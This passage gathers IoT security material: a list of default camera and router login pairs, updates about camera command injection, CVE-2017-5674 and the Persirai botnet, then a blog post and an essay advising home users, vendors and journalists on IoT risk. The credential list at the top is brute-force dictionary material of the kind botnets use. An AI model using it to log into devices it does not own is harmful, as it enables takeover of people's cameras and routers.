      root     1234
      root     klv123
      Administrator admin
      service  service
      supervisor supervisor
      guest    guest
      guest    12345
      guest    12345
      admin1   password
      administrator 1234
      666666   666666
      888888   888888
      ubnt     ubnt
      root     klv1234
      root     Zte521
      root     hi3518
      root     jvbzd
      root     anko
      root     zlxx.
      root     7ujMko0vizxv
      root     7ujMko0admin
      root     system
      root     ikwb
      root     dreambox
      root     user
      root     realtek
      root     00000000
      admin    1111111
      admin    1234
      admin    12345
      admin    54321
      admin    123456
      admin    7ujMko0admin
      admin    1234
      admin    pass
      admin    meinsm
      tech     tech
      mother   fucker

      Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera, if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, but now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
      Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
      Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

      Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE),
      which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

      Update 2017-05-11: CVE-2017-5674 (see above) and my command injection exploit was combined in the Persirai botnet. 120 000 cameras is expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
      This issue might be worse than the Mirai worm, because this effects cameras and other IoT behind NAT where UPNP was enabled.
      http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


      How to secure your home against "Internet of Things" and FUD

      TL;DR most of the security news about IoT are full of FUD. Always put the risks in context - who can exploit this and what can the attacker do with it. Most news only cover the latter.

      Introduction

      There is rarely a day without news that another "Internet of Things" got hacked. "Smart" safes, "smart" rifles, "smart" cars, "smart" fridges, "smart" TVs, "smart" alarm systems, "smart" meters, "smart" bulbs, NAS devices, routers. These devices are getting hacked every day. Because most of these devices were never designed with security as a goal, and some of them have been never tested by security professionals, it is no surprise that these things are full of vulnerabilities.





      Independent security researchers find these vulnerabilities, write a cool blog post or give a presentation about the vulnerability and the exploit, and the media forgets the constraints just for the sake of more clicks. "We are all doomed" we can read in the news, but sometimes the risks are buried deeply in technical jargon. Please note I blame the news sites here, not the researchers.

      http://www.slideshare.net/danielmiessler/iot-attack-surfaces-defcon-2015

      There are huge differences between the following risks:

      • Attackers can directly communicate with the router (or camera) from the Internet without authentication and exploit the vulnerability. This is the worst case scenario. For example an automated ransomware attack against your NAS is pretty bad.
      • Attackers have to position themselves in the same WAN network (e.g. Sprint mobile network in the case of Jeep hacking) to exploit the vulnerability. This is still pretty bad.
      • The vulnerable code can not be triggered directly from the Internet, but tricks like CSRF can be used to exploit it (details later in this post). 
      • The vulnerable code can not be triggered directly from the Internet, and it uses a protocol/port which prevents Cross Protocol Scripting. Attackers have to access the local network before exploiting this vulnerability.
      As it is the case with the worst scenario, one can find a lot of devices connected to the internet. You can always find funny stuff at http://explorer.shodanhq.com/#/explore , or use the nmap screenshot script to find your own stuff :)


      Network exposure

      Most devices are behind an IPv4 NAT device (e.g. home router), thus can not be reached from the Internet side by default. Except when the device configures the firewall via UPNP. Or the device has a persistence cloud connection, and the cloud can send commands to the device. Or the device uses IPv6 tunneling (e.g. Teredo), thus it is reachable from the Internet. But not every vulnerability on your home network is accessible directly from the Internet. As more and more devices and networks will support IPv6, this scenario might change, but I hope most home routers will come with a default deny configuration in their IPv6 firewall module. On the other hand, scanning for IPv6 devices blindly is not feasible due to the large number of IPv6 addresses, but some tricks might work

      If attackers can not access the device directly, there is a way to hack it through the user's browser. Just convince the victim user to visit a website, and via CSRF (Cross Site Request Forgery) and brute-forcing the device IP, it is possible to hack some devices (mostly through HTTP - if the exploit can fit into simple GET or POST commands.

      If attackers can not attack the device vulnerability through the Internet directly, or via CSRF, but  have connect to the same network - the network exposure shrinks significantly. And when attackers are on the same network as you, I bet you have bigger problems than the security of the IoT devices ...

      Recommendations for home users

      Don't buy **** you don't need

      Disable cloud connectivity if it is not necessary. For example I have a NAS device which can be reached through the "cloud", but I have disabled it by not configuring any default gateway for the device. I prefer connecting to my network via VPN and reach all my stuff through that.

      Prevent CSRF attacks. I use two tricks. Don't use the 192.168.0.x - 192.168.10.x network at home - use an uncommon IP range instead (e.g. 192.168.156.x is better). The second trick is I configured my Adblock plugin in my primary browser to block access to my internal network. And I use another browser whenever I want to access my internal devices. Update: On Firefox you can use NoScript ABE to block access to internal resources.


      Check your router configuration:

      • disable UPNP
      • check the firewall settings and disable unnecessary port forwards
      • check for IPv6 settings, and configure the firewall as default deny for incoming IPv6 TCP/UDP.

      Change default passwords, especially for services connected to the Internet. Follow password best practices.

      Run Nmap to locate new IoT in your home network :) 

      Run WiFi scan to locate new WiFi access points. Let me share a personal experience with you. I moved to a new house, and brought my own WiFi router with me. I plugged it in, and forget about WiFi. Months later it turned out I had two other WiFi devices in my house - the cable modem had it's own integrated WiFi with default passwords printed on the bottom, and the Set-top-box was the same - default WiFi passwords printed on the bottom. And don't forget to scan for ZigBee, Bluetooth, IrDA, FM, ...

      Update your devices - in case you have a lot of free time in your hand.

      Don't allow your guests to connect to your home network. Set up a separated AP for them. Imagine your nephew stealing your private photos or videos from your NAS or DNLA server.

      With great power, it comes great responsibility. The less device you own in your house, the less time you need to maintain those.

      Read the manuals of your devices. Be aware of the different interfaces. Configure it in a secure way.

      Stop being amazed by junk hacking.

      Update: Disable WebRTC: https://www.browserleaks.com/webrtc , in Chrome you can use this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia

      Update: Prevent against DNS rebind attacks via configuring a DNS server which can block internal IP addresses. OpenDNS can block internal IP, but this is not a default option, you have to configure it.

      Recommendations for vendors

      For vendors, I recommend at least the followings:

      • Implement security during Software Development LifeCycle
      • Continuous security testing and bug bounties
      • Seamless auto-update
      • Opt-in cloud connectivity

      Recommendations for journalists

      Stop FUD. Pretty please.

      The questions to ask before losing your head

      • who can exploit the vulnerability?
      • what prerequisites do we have about the attack to successfully exploit the vulnerability? Is the attacker already in your home network? If yes, you have probably bigger problems.
      • what can the attacker do when the exploit is successful?

      And last but not least don't forget that in the case of IoT devices sometimes users are the product, not the customer. IoT is about collecting data for marketing purposes.


      For an Internet of Things, We Are Going to Need Better Things

      There's a lot of hype around at the moment about "The Internet of Things" (IoT), which, I suppose, is all about attaching, uh, things to the Internet. By "things", it seems we are supposed to be thinking household goods, vehicles; basically anything with electrical current running through it is a candidate for the "internet of things".

      While setting up a cheapo DVD player last week, I couldn't help thinking of Chief Brody in the film "Jaws"... "You're going to need a bigger boat", he says, on seeing the enormous shark. We're going to need a bigger mindset on security if we are to survive the onslaught of "things". The firmware in the kind of devices we are already routinely connecting up is drivel. I mean some of it is absolute garbage. I know there are exceptions, but most of it is badly built, and almost none of it is ever updated.

      Each of these devices is likely perfectly capable as a host in a botnet - for DDoS, for sending SPAM, SPIM and SPIT (OK, we are yet to see much in the way of unsolicited Internet Telephony... but with the IoT, devices built to make calls/send texts are likely to get hijacked), so each of these devices has a value to the Internet's vast supply of wrongdoers.

      Researchers at Eurcom recently completed a study showing up vulnerabilities in the 30 thousand or so firmware images they scraped from vendor websites. Apparently one image even contained a linux kernel whose age had just hit double figures. Ouch. The "Nest" next-gen thermostat hasn't been without issues either, a high profile target, at least we can expect firmware updates from them!

      Synology's NAS storage devices are among the early victims of malware attacking non-traditional computing devices, and may be an indication of IoT issues to come. Users of these storage devices have found themselves victim of a crypto-ransomware attack: their files are encrypted, and the encryption keys offered for sale back to them! Other early warnings come in the form of attacks on SCADA industrial control systems. These are all places that traditionally, little or no emphasis has been placed on security.

      What can we do to help ourselves here? My advice is be careful before you buy anything you're going to add to your network. Look to see if the vendor has a firmware download, and if there's a recent-ish update. If they're the fire'n'forget types, you're probably not going to want to deploy it.

      Footnote: Gartner appears to believe the Internet of Things to have reached "peak hype". Reminds me of an old saying about those dwelling in vitreous abodes launching masonry...